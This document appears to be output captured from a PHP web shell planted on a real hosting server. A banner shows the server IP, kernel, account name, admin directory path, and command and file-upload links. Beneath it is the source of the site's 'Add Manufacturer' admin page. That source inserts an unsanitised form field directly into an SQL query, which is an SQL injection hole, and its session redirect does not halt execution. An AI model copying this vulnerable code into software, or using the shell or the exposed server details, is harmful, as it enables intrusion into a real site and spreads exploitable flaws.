|
Server IP : 82.112.239.40 / Your IP : 216.73.216.81 Web Server : LiteSpeed System : Linux in-mum-web1676.main-hosting.eu 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64 User : u641149403 ( 641149403) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u641149403/domains/uniformindia.co.in/public_html/admin/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
// start session
ob_start();
session_start();
// set time for session timeout
$currentTime = time() + 25200;
$expired = 3600;
// if session not set go to login page
if(!isset($_SESSION['user'])){
header("location:index.php");
}
// if current time is more than session timeout back to login page
if($currentTime > $_SESSION['timeout']){
session_destroy();
header("location:index.php");
}
// destroy previous session timeout and create new one
unset($_SESSION['timeout']);
$_SESSION['timeout'] = $currentTime + $expired;
?>
<?php include"header.php";?>
<html>
<head>
<title>Add Manufacturer | <?=$settings['app_name']?> - Dashboard</title>
</head>
</body>
<!-- Content Wrapper. Contains page content -->
<div class="content-wrapper">
<?php
include_once('includes/functions.php');
$function = new functions;
?>
<?php
if(isset($_POST['btnAdd'])){
if($permissions['categories']['create']==1){
$title = $_POST['title'];
$error = array();
$sql_query = "INSERT INTO manufacturer (title)
VALUES('$title')";
// Execute query
$db->sql($sql_query);
// store result
$result = $db->getResult();
if(!empty($result)){
$result=0;
}else{
$result=1;
}
if($result==1){
$error['manufacturer'] = " <section class='content-header'>
<span class='label label-success'>Manufacturer Added Successfully</span>
</section>";
}else{
$error['manufacturer'] = " <span class='label label-danger'>Failed add Manufacturer</span>";
}
}
}
?>
<section class="content-header">
<h1>Add Manufacturer <small><a href='manufacturer.php'> <i class='fa fa-angle-double-left'></i> Back to Manufacturer</a></small></h1>
<?php echo isset($error['manufacturer']) ? $error['manufacturer'] : '';?>
<ol class="breadcrumb">
<li><a href="home.php"><i class="fa fa-home"></i> Home</a></li>
</ol>
<hr />
</section>
<section class="content">
<div class="row">
<div class="col-md-6">
<?php if($permissions['categories']['create']==0) { ?>
<div class="alert alert-danger">You have no permission to create Manufacturer.</div>
<?php } ?>
<!-- general form elements -->
<div class="box box-primary">
<div class="box-header with-border">
<h3 class="box-title">Add Manufacturer</h3>
</div><!-- /.box-header -->
<!-- form start -->
<form method="post" enctype="multipart/form-data">
<div class="box-body">
<div class="form-group">
<label for="exampleInputEmail1">Manufacturer</label>
<input type="text" class="form-control" name="title" required>
</div>
</div><!-- /.box-body -->
<div class="box-footer">
<button type="submit" class="btn btn-primary" name="btnAdd">Add</button>
<input type="reset" class="btn-warning btn" value="Clear"/>
</div>
</form>
</div><!-- /.box -->
<?php echo isset($error['check_permission']) ? $error['check_permission'] : '';?>
</div>
</div>
</section>
<div class="separator"> </div>
<?php $db->disconnect(); ?>
</div><!-- /.content-wrapper -->
</body>
</html>
<?php include"footer.php";?>